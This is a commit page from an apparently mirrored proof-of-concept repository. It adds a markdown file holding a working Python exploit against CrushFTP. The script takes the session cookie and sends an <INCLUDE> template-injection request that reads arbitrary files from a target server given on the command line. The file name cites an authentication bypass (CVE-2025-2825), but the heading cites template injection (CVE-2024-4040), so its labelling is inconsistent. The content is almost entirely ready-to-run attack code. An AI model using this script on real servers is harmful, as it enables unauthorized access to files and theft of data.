admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-06-20 09:51:11 +00:00
Code Issues Packages Projects Releases Wiki Activity

Update and rename CrushFTP身份验证绕过(CVE-2025-2825) to CrushFTP身份验证绕过(CVE-2025-2825).md

Browse Source
This commit is contained in:
Rainyseason 2025-03-31 14:53:36 +08:00 committed by GitHub
parent d84ffb4b26
commit e7d58c6b09
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
2 changed files with 60 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1
wpoc/CrushFTP/CrushFTP身份验证绕过(CVE-2025-2825)
View File

@ -1 +0,0 @@

60
wpoc/CrushFTP/CrushFTP身份验证绕过(CVE-2025-2825).md Normal file
View File

@ -0,0 +1,60 @@
## CrushFTP服务器端模板注入(CVE-2024-4040)
## poc
```python
import requests
import argparse
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKCYAN = '\033[96m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
def get_cookies(url):
try:
session = requests.Session()
response = session.get(url)
if response.status_code != 200:
raise Exception("Failed to connect to the server")
session.cookies.get_dict()
return session.cookies.get_dict()
except Exception as e:
print(FAIL + "Error: " + str(e) + ENDC)
quit()
def exploit(url, cookies, path):
try:
if not path.startswith("/") or not path.endswith("/"):
raise Exception("Invalid path format. Path should start and end with '/'")
url = url + "/WebInterface/function/?command=zip&c2f=" + cookies['currentAuth'] + "&path=<INCLUDE>" + path + "</INCLUDE>&names=*"
response = requests.get(url, cookies=cookies)
if response.status_code != 200:
raise Exception("Failed to connect to the server")
return response.text
except Exception as e:
print(FAIL + "Error: " + str(e) + ENDC)
quit()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url", help="URL of the target", required=True)
parser.add_argument("-p", "--path", help="Path to the file to read", required=True)
args = parser.parse_args()
url = args.url
path = args.path
if not url.startswith("http"):
print(WARNING + "URL should start with 'http' or 'https'")
quit()
cookies = get_cookies(url)
if 'currentAuth' not in cookies:
print(WARNING + "Not vulnerable" + ENDC)
quit()
else:
print(OKCYAN + exploit(url, cookies, path) + ENDC)
```